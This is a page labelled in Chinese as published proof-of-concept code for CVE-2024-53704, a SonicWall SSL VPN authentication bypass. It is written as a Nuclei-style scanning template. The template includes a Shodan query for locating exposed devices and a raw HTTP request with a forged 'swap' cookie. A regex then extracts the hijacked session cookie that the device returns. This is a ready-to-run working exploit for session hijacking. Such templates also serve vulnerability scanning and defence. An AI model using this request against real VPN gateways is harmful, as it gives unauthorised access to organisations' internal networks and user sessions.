漏洞描述
An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication.
CVE-2024-53704: SSL VPN Session Hijacking
PoC代码[已公开]
id: CVE-2024-53704
info:
name: SSL VPN Session Hijacking
author: johnk3r
severity: critical
description: |
An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication.
reference:
- https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-53704
cwe-id: CWE-287
epss-score: 0.93819
epss-percentile: 0.99853
metadata:
verified: true
max-request: 1
shodan-query: "http.html_hash:-1466805544"
tags: cve,cve2024,sonicwall,kev,vkev,vuln
http:
- raw:
- |
GET /cgi-bin/sslvpnclient?launchplatform= HTTP/1.1
Host: {{Hostname}}
Cookie: swap=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- "NELaunchX1"
- type: status
status:
- 200
extractors:
- type: regex
part: header
regex:
- 'Set-Cookie: swap=([a-zA-Z0-9]+);'
# digest: 490a00463044022039e6a0c3299479fb51b03981636a78661ba436c78629cf1a3e840e493d07cb9902203becc685afc8673d59218083930afab16e8d0bc2c692ad73383902899b3fc8af:922c64590222798bb761d5b6d8e72950